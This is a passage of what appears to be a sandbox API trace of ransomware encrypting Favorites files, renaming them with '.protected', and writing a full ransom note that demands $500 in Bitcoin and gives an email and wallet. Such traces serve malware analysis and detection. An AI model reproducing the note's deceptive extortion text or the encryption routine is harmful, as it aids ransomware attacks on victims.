pbBuffer=0x295eebc) returned 1 [0095.182] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: 
pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.182] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.182] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 68 [0095.182] StrStrW (lpFirst="IE Add-on site.url", lpSrch=".txt") returned 0x0 [0095.182] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 68 [0095.182] StrStrW (lpFirst="IE Add-on site.url", lpSrch=".rar") returned 0x0 [0095.182] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 68 [0095.182] StrStrW (lpFirst="IE Add-on site.url", lpSrch=".zip") returned 0x0 [0095.182] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.184] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.184] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.184] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.184] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, 
lpOverlapped=0x0) returned 1 [0095.184] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.184] CloseHandle (hObject=0xd4) returned 1 [0095.185] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url.protected") returned 78 [0095.185] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url.protected" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url.protected")) returned 1 [0095.186] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.186] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="Windows") returned -1 [0095.186] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="Program Files") returned -1 [0095.186] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="Program Files (x86)") returned -1 [0095.186] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="$Recycle.bin") returned 1 [0095.186] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="System Volume Information") returned -1 [0095.186] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 78 [0095.186] StrStrIW (lpFirst="IE site on Microsoft.com.url", lpSrch=".protected") returned 0x0 [0095.186] lstrcmpW (lpString1="IE site on Microsoft.com.url", lpString2="RESTORE_FILES.txt") returned -1 [0095.186] CryptGenRandom (in: 
hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.186] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.186] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 78 [0095.186] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch=".txt") returned 0x0 [0095.187] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 78 [0095.187] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch=".rar") returned 0x0 [0095.187] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 78 [0095.187] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch=".zip") returned 0x0 [0095.187] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.187] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.188] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.188] SetFilePointerEx (in: hFile=0xd4, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.188] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.188] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.189] CloseHandle (hObject=0xd4) returned 1 [0095.189] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.protected") returned 88 [0095.189] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.protected" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url.protected")) returned 1 [0095.190] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.190] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="Windows") returned -1 [0095.190] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="Program Files") returned -1 [0095.190] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="Program Files (x86)") returned -1 [0095.190] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="$Recycle.bin") returned 1 [0095.190] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="System Volume Information") returned -1 [0095.190] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 71 [0095.190] StrStrIW (lpFirst="Microsoft At Home.url", lpSrch=".protected") returned 0x0 [0095.190] lstrcmpW (lpString1="Microsoft At Home.url", lpString2="RESTORE_FILES.txt") returned -1 [0095.190] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.190] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.190] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.190] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 71 [0095.190] StrStrW (lpFirst="Microsoft At Home.url", lpSrch=".txt") returned 0x0 [0095.190] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 71 [0095.191] StrStrW (lpFirst="Microsoft At Home.url", lpSrch=".rar") returned 0x0 [0095.191] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 71 [0095.191] StrStrW (lpFirst="Microsoft At Home.url", lpSrch=".zip") returned 0x0 [0095.191] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.191] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.192] 
WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.192] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.192] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.192] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.193] CloseHandle (hObject=0xd4) returned 1 [0095.193] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url.protected") returned 81 [0095.193] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url.protected" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url.protected")) returned 1 [0095.194] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.194] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="Windows") returned -1 [0095.194] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="Program Files") returned -1 [0095.194] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="Program Files (x86)") returned -1 [0095.194] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="$Recycle.bin") 
returned 1 [0095.194] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="System Volume Information") returned -1 [0095.194] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 71 [0095.194] StrStrIW (lpFirst="Microsoft At Work.url", lpSrch=".protected") returned 0x0 [0095.194] lstrcmpW (lpString1="Microsoft At Work.url", lpString2="RESTORE_FILES.txt") returned -1 [0095.194] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.194] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.195] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 71 [0095.195] StrStrW (lpFirst="Microsoft At Work.url", lpSrch=".txt") returned 0x0 [0095.195] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 71 [0095.195] StrStrW (lpFirst="Microsoft At Work.url", lpSrch=".rar") returned 0x0 [0095.195] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 71 [0095.195] StrStrW (lpFirst="Microsoft At Work.url", lpSrch=".zip") returned 0x0 [0095.195] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, 
lpOverlapped=0x0) returned 1 [0095.196] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.196] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.196] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.197] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.197] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.197] CloseHandle (hObject=0xd4) returned 1 [0095.197] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url.protected") returned 81 [0095.197] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url.protected" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url.protected")) returned 1 [0095.198] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.198] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="Windows") returned -1 [0095.198] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="Program 
Files") returned -1 [0095.198] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="Program Files (x86)") returned -1 [0095.198] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="$Recycle.bin") returned 1 [0095.198] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="System Volume Information") returned -1 [0095.198] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 69 [0095.198] StrStrIW (lpFirst="Microsoft Store.url", lpSrch=".protected") returned 0x0 [0095.198] lstrcmpW (lpString1="Microsoft Store.url", lpString2="RESTORE_FILES.txt") returned -1 [0095.198] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.198] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.199] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 69 [0095.199] StrStrW (lpFirst="Microsoft Store.url", lpSrch=".txt") returned 0x0 [0095.199] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 69 [0095.199] StrStrW (lpFirst="Microsoft Store.url", lpSrch=".rar") returned 0x0 [0095.199] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 69 [0095.199] StrStrW (lpFirst="Microsoft Store.url", lpSrch=".zip") returned 0x0 [0095.199] ReadFile (in: 
hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x86, lpOverlapped=0x0) returned 1 [0095.200] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.200] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x86, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x86, lpOverlapped=0x0) returned 1 [0095.201] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.201] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.201] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.201] CloseHandle (hObject=0xd4) returned 1 [0095.202] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url.protected") returned 79 [0095.202] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url.protected" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url.protected")) returned 1 [0095.202] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 
[0095.202] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0095.202] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\RESTORE_FILES.txt") returned 67 [0095.203] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.203] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.203] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0095.204] lstrlenA (lpString="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") returned 684 [0095.204] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0095.204] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.204] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0095.204] CloseHandle (hObject=0xb4) returned 1 [0095.205] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.205] lstrcmpiW (lpString1="MSN Websites", lpString2="Windows") returned -1 [0095.205] lstrcmpiW (lpString1="MSN Websites", lpString2="Program Files") returned -1 [0095.205] lstrcmpiW (lpString1="MSN Websites", lpString2="Program Files (x86)") returned -1 [0095.205] lstrcmpiW (lpString1="MSN Websites", lpString2="$Recycle.bin") returned 1 [0095.205] lstrcmpiW (lpString1="MSN Websites", lpString2="System Volume Information") returned -1 [0095.205] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites") returned 43 [0095.205] lstrcmpW (lpString1="MSN Websites", lpString2=".") returned 1 [0095.205] lstrcmpW (lpString1="MSN Websites", lpString2="..") returned 1 [0095.206] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*") returned 45 [0095.206] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0095.207] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.207] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.207] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.207] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.207] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.207] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\.") returned 45 [0095.207] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.207] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) 
returned 1 [0095.207] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.207] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.207] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.207] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.207] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.207] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\..") returned 46 [0095.207] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.208] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.208] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.208] lstrcmpiW (lpString1="MSN Autos.url", lpString2="Windows") returned -1 [0095.208] lstrcmpiW (lpString1="MSN Autos.url", lpString2="Program Files") returned -1 [0095.208] lstrcmpiW (lpString1="MSN Autos.url", lpString2="Program Files (x86)") returned -1 [0095.208] lstrcmpiW (lpString1="MSN Autos.url", lpString2="$Recycle.bin") returned 1 [0095.208] lstrcmpiW (lpString1="MSN Autos.url", lpString2="System Volume Information") returned -1 [0095.208] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url") returned 57 [0095.208] StrStrIW (lpFirst="MSN Autos.url", lpSrch=".protected") returned 0x0 [0095.208] lstrcmpW (lpString1="MSN Autos.url", 